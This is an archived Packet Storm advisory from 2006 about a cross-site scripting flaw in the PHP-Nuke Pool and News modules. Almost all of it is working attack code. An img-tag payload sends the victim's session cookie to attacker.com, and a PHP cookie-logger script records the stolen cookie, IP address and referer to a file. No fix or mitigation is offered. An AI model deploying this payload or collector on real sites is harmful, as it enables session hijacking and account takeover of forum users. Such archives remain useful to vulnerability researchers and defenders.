phpnukePoolXSS.txt

2006-01-10T00:00:00
ID PACKETSTORM:42915
Type packetstorm
Reporter Night_Warrior
Modified 2006-01-10T00:00:00

Description

                                        
                                            `##Night_Warrior<Kurdihs Hacker>  
##night_warrior771[at]hotmail.com  
##Php-Nuke Pool and News Module IMG Tag Cross Site Scripting  
##Contact :night_warrior771[at]hotmail.com  
Post Coment this Code:  
<img src="javascript:window.navigate('http://attacker.com/cookies.php?c='+document.cookie);"  
  
cookies.php  
$cookie = $_GET['c'];  
$ip = getenv ('REMOTE_ADDR');  
$date=date("j F, Y, g:i a");  
$referer=getenv ('HTTP_REFERER');  
$fp = fopen('steal.php', 'a');  
fwrite($fp, '  
Cookie: '.$cookie.'  
IP: ' .$ip. '  
Date and Time: ' .$date. '  
Referer: '.$referer.' ');  
fclose($fp);  
?>  
`